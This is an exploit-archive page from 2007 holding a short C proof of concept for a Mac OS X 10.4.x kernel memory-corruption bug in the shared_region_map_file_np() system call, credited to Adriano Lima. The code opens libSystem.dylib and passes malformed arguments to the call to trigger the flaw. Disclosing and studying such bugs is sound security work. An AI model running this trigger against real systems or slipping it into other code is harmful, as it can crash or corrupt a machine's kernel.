Mac OS X 10.4.x Kernel shared_region_map_file

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mac OS X 10.4.x Kernel shared_region_map_file_np() Memory Corruption
# Published : 2007-01-21
# Author : Adriano Lima
# Previous Title : D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit
# Next Title : Transmit.app <= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC

/*
This vulnerability was discovered by Adriano Lima
<adriano@risesecurity.org>.

REFERENCES

[1] Mac OS X Internals: A Systems Approach By Amit Singh

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information
provided, including any kind of information which is incomplete or
incorrect,
will therefore be rejected.
*/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(int argc,char **argv){
   int fd;

   if((fd=open("/usr/lib/libSystem.dylib",O_RDONLY))==-1){
       perror("open");
       exit(EXIT_FAILURE);
   }

   if(syscall(SYS_shared_region_map_file_np,fd,0x02000000,NULL,NULL)==-1){
       perror("shared_region_map_file_np");
       exit(EXIT_FAILURE);
   }

   exit(EXIT_FAILURE);
}

// www.Syue.com [2007-01-21]